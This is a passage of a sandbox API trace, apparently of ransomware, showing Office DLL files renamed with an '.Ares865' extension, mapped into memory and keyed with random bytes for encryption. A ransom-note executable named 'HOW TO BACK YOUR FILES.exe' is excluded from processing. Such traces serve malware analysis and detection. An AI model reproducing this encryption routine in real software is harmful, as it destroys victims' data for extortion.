(lpString=".dll") returned 4 [0129.178] lstrcmpiW (lpString1="NAMECONTROLPROXY.DLL", lpString2=".dll") returned 1 [0129.178] lstrlenW (lpString=".lnk") returned 4 [0129.178] lstrcmpiW (lpString1="NAMECONTROLPROXY.DLL", lpString2=".lnk") returned 1 [0129.178] lstrlenW (lpString=".ini") returned 4 [0129.178] lstrcmpiW (lpString1="NAMECONTROLPROXY.DLL", lpString2=".ini") returned 1 [0129.178] lstrlenW (lpString=".sys") returned 4 [0129.178] lstrcmpiW (lpString1="NAMECONTROLPROXY.DLL", lpString2=".sys") returned 1 [0129.178] lstrlenW (lpString="NAMECONTROLPROXY.DLL") returned 20 [0129.178] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft Office\\Office14\\NAMECONTROLPROXY.DLL.Ares865") returned 77 [0129.178] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\NAMECONTROLPROXY.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\namecontrolproxy.dll"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\NAMECONTROLPROXY.DLL.Ares865" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\namecontrolproxy.dll.ares865"), dwFlags=0x1) returned 1 [0129.181] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\NAMECONTROLPROXY.DLL.Ares865" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\namecontrolproxy.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0129.181] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=16256) returned 1 [0129.181] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0129.181] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0129.181] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0129.181] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0129.182] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0129.182] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0129.182] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4280, lpName=0x0) returned 0x170 [0129.184] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4280) returned 0x190000 [0129.185] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0129.186] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0129.186] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0129.186] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4800 [0129.186] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4800 | out: hHeap=0x2b0000) returned 1 [0129.186] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0129.186] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0129.186] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0129.186] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0129.186] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0129.186] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0129.186] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0129.186] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0129.186] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0129.187] CloseHandle (hObject=0x170) returned 1 [0129.187] CloseHandle (hObject=0x118) returned 1 [0129.187] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0129.187] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0129.187] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0129.187] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x703f00, ftCreationTime.dwHighDateTime=0x1ca9139, ftLastAccessTime.dwLowDateTime=0x220cfc30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x703f00, ftLastWriteTime.dwHighDateTime=0x1ca9139, nFileSizeHigh=0x0, nFileSizeLow=0x21180, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NAMEEXT.DLL", cAlternateFileName="")) returned 1 [0129.187] lstrcmpiW (lpString1="NAMEEXT.DLL", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0129.187] lstrcmpiW (lpString1="NAMEEXT.DLL", lpString2="aoldtz.exe") returned 1 [0129.187] lstrcpyW (in: lpString1=0x2cce462, lpString2="NAMEEXT.DLL" | out: lpString1="NAMEEXT.DLL") returned="NAMEEXT.DLL" [0129.187] lstrlenW (lpString="NAMEEXT.DLL") returned 11 [0129.187] lstrlenW (lpString="Ares865") returned 7 [0129.187] lstrcmpiW (lpString1="EXT.DLL", lpString2="Ares865") returned 1 [0129.188] lstrlenW (lpString=".dll") returned 4 [0129.188] lstrcmpiW (lpString1="NAMEEXT.DLL", lpString2=".dll") returned 1 [0129.188] lstrlenW (lpString=".lnk") returned 4 [0129.188] lstrcmpiW (lpString1="NAMEEXT.DLL", lpString2=".lnk") returned 1 [0129.188] lstrlenW (lpString=".ini") returned 4 [0129.188] lstrcmpiW (lpString1="NAMEEXT.DLL", lpString2=".ini") returned 1 [0129.188] lstrlenW (lpString=".sys") returned 4 [0129.188] lstrcmpiW (lpString1="NAMEEXT.DLL", lpString2=".sys") returned 1 [0129.188] lstrlenW (lpString="NAMEEXT.DLL") returned 11 [0129.188] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft Office\\Office14\\NAMEEXT.DLL.Ares865") returned 68 [0129.188] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\NAMEEXT.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\nameext.dll"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\NAMEEXT.DLL.Ares865" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\nameext.dll.ares865"), dwFlags=0x1) returned 1 [0129.191] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\NAMEEXT.DLL.Ares865" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\nameext.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0129.191] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=135552) returned 1 [0129.191] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0129.191] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0129.191] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0129.192] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0129.192] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0129.192] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0129.192] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x21480, lpName=0x0) returned 0x170 [0129.194] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x21480) returned 0x420000 [0129.203] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0129.204] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0129.204] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0129.204] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4800 [0129.204] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4800 | out: hHeap=0x2b0000) returned 1 [0129.204] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0129.204] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0129.204] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0129.204] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0129.204] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0129.204] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0129.204] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0129.204] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0129.204] UnmapViewOfFile (lpBaseAddress=0x420000) returned 1 [0129.206] CloseHandle (hObject=0x170) returned 1 [0129.206] CloseHandle (hObject=0x118) returned 1 [0129.206] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0129.206] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0129.206] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0129.207] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbf08900, ftCreationTime.dwHighDateTime=0x1ca9120, ftLastAccessTime.dwLowDateTime=0x221681b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xcbf08900, ftLastWriteTime.dwHighDateTime=0x1ca9120, nFileSizeHigh=0x0, nFileSizeLow=0x41a0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NPAUTHZ.DLL", cAlternateFileName="")) returned 1 [0129.207] lstrcmpiW (lpString1="NPAUTHZ.DLL", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0129.207] lstrcmpiW (lpString1="NPAUTHZ.DLL", lpString2="aoldtz.exe") returned 1 [0129.207] lstrcpyW (in: lpString1=0x2cce462, lpString2="NPAUTHZ.DLL" | out: lpString1="NPAUTHZ.DLL") returned="NPAUTHZ.DLL" [0129.207] lstrlenW (lpString="NPAUTHZ.DLL") returned 11 [0129.207] lstrlenW (lpString="Ares865") returned 7 [0129.207] lstrcmpiW (lpString1="THZ.DLL", lpString2="Ares865") returned 1 [0129.207] lstrlenW (lpString=".dll") returned 4 [0129.207] lstrcmpiW (lpString1="NPAUTHZ.DLL", lpString2=".dll") returned 1 [0129.207] lstrlenW (lpString=".lnk") returned 4 [0129.207] lstrcmpiW (lpString1="NPAUTHZ.DLL", lpString2=".lnk") returned 1 [0129.207] lstrlenW (lpString=".ini") returned 4 [0129.207] lstrcmpiW (lpString1="NPAUTHZ.DLL", lpString2=".ini") returned 1 [0129.207] lstrlenW (lpString=".sys") returned 4 [0129.207] lstrcmpiW (lpString1="NPAUTHZ.DLL", lpString2=".sys") returned 1 [0129.207] lstrlenW (lpString="NPAUTHZ.DLL") returned 11 [0129.208] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft Office\\Office14\\NPAUTHZ.DLL.Ares865") returned 68 [0129.208] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\NPAUTHZ.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\npauthz.dll"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\NPAUTHZ.DLL.Ares865" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\npauthz.dll.ares865"), dwFlags=0x1) returned 1 [0129.209] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\NPAUTHZ.DLL.Ares865" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\npauthz.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0129.210] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=16800) returned 1 [0129.210] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0129.210] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0129.210] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0129.210] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0129.211] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0129.211] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0129.211] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x44a0, lpName=0x0) returned 0x170 [0129.212] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x44a0) returned 0x190000 [0129.214] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0129.215] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0129.215] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0129.215] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4800 [0129.215] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4800 | out: hHeap=0x2b0000) returned 1 [0129.215] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0129.215] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0129.215] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0129.215] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0129.215] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0129.215] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0129.215] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0129.215] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0129.215] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0129.216] CloseHandle (hObject=0x170) returned 1 [0129.216] CloseHandle (hObject=0x118) returned 1 [0129.216] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0129.216] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0129.216] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0129.216] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed67eb00, ftCreationTime.dwHighDateTime=0x1cacb3b, ftLastAccessTime.dwLowDateTime=0x221681b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xed67eb00, ftLastWriteTime.dwHighDateTime=0x1cacb3b, nFileSizeHigh=0x0, nFileSizeLow=0x59e8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NPSPWRAP.DLL", cAlternateFileName="")) returned 1 [0129.216] lstrcmpiW (lpString1="NPSPWRAP.DLL", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0129.216] lstrcmpiW (lpString1="NPSPWRAP.DLL", lpString2="aoldtz.exe") returned 1 [0129.216] lstrcpyW (in: lpString1=0x2cce462, lpString2="NPSPWRAP.DLL" | out: lpString1="NPSPWRAP.DLL") returned="NPSPWRAP.DLL" [0129.216] lstrlenW (lpString="NPSPWRAP.DLL") returned 12 [0129.216] lstrlenW (lpString="Ares865") returned 7 [0129.216] lstrcmpiW (lpString1="RAP.DLL", lpString2="Ares865") returned 1 [0129.216] lstrlenW (lpString=".dll") returned 4 [0129.216] lstrcmpiW (lpString1="NPSPWRAP.DLL", lpString2=".dll") returned 1 [0129.216] lstrlenW (lpString=".lnk") returned 4 [0129.216] lstrcmpiW (lpString1="NPSPWRAP.DLL", lpString2=".lnk") returned 1 [0129.216] lstrlenW (lpString=".ini") returned 4 [0129.216] lstrcmpiW (lpString1="NPSPWRAP.DLL", lpString2=".ini") returned 1 [0129.216] lstrlenW (lpString=".sys") returned 4 [0129.216] lstrcmpiW (lpString1="NPSPWRAP.DLL", lpString2=".sys") returned 1 [0129.217] lstrlenW (lpString="NPSPWRAP.DLL") returned 12 [0129.217] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft Office\\Office14\\NPSPWRAP.DLL.Ares865") returned 69 [0129.217] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\NPSPWRAP.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\npspwrap.dll"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\NPSPWRAP.DLL.Ares865" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\npspwrap.dll.ares865"), dwFlags=0x1) returned 1 [0129.218] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\NPSPWRAP.DLL.Ares865" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\npspwrap.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0129.219] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=23016) returned 1 [0129.219] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0129.219] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0129.219] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0129.219] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0129.220] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0129.220] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0129.220] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x5cf0, lpName=0x0) returned 0x170 [0129.222] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5cf0) returned 0x190000 [0129.223] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0129.224] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0129.224] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0129.224] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4800 [0129.224] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4800 | out: hHeap=0x2b0000) returned 1 [0129.224] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0129.224] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0129.224] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0129.224] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0129.224] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0129.225] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0129.225] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0129.225] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0129.225] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0129.225] CloseHandle (hObject=0x170) returned 1 [0129.225] CloseHandle (hObject=0x118) returned 1 [0129.225] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0129.225] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0129.225] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0129.225] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8c44700, ftCreationTime.dwHighDateTime=0x1cab7c8, ftLastAccessTime.dwLowDateTime=0x597a6090, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe8c44700, ftLastWriteTime.dwHighDateTime=0x1cab7c8, nFileSizeHigh=0x0, nFileSizeLow=0x5988, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="oisctrl.dll", cAlternateFileName="")) returned 1 [0129.225] lstrcmpiW (lpString1="oisctrl.dll", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0129.225] lstrcmpiW (lpString1="oisctrl.dll", lpString2="aoldtz.exe") returned 1 [0129.226] lstrcpyW (in: lpString1=0x2cce462, lpString2="oisctrl.dll" | out: lpString1="oisctrl.dll") returned="oisctrl.dll" [0129.226] lstrlenW (lpString="oisctrl.dll") returned 11 [0129.226] lstrlenW (lpString="Ares865") returned 7 [0129.226] lstrcmpiW (lpString1="trl.dll", lpString2="Ares865") returned 1 [0129.226] lstrlenW (lpString=".dll") returned 4 [0129.226] lstrcmpiW (lpString1="oisctrl.dll", lpString2=".dll") returned 1 [0129.226] lstrlenW (lpString=".lnk") returned 4 [0129.226] lstrcmpiW (lpString1="oisctrl.dll", lpString2=".lnk") returned 1 [0129.226] lstrlenW (lpString=".ini") returned 4 [0129.226] lstrcmpiW (lpString1="oisctrl.dll", lpString2=".ini") returned 1 [0129.226] lstrlenW (lpString=".sys") returned 4 [0129.226] lstrcmpiW (lpString1="oisctrl.dll", lpString2=".sys") returned 1 [0129.226] lstrlenW (lpString="oisctrl.dll") returned 11 [0129.226] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft Office\\Office14\\oisctrl.dll.Ares865") returned 68 [0129.226] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\oisctrl.dll" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\oisctrl.dll"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\oisctrl.dll.Ares865" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\oisctrl.dll.ares865"), dwFlags=0x1) returned 1 [0129.229] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\oisctrl.dll.Ares865" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\oisctrl.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0129.229] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=22920) returned 1 [0129.229] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0129.229] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0129.229] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0129.229] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0129.230] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0129.230] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0129.230] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x5c90, lpName=0x0) returned 0x170 [0129.232] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5c90) returned 0x190000 [0129.233] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0129.234] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0129.234] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0129.234] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4800 [0129.234] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4800 | out: hHeap=0x2b0000) returned 1 [0129.234] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0129.234] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0129.234] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | 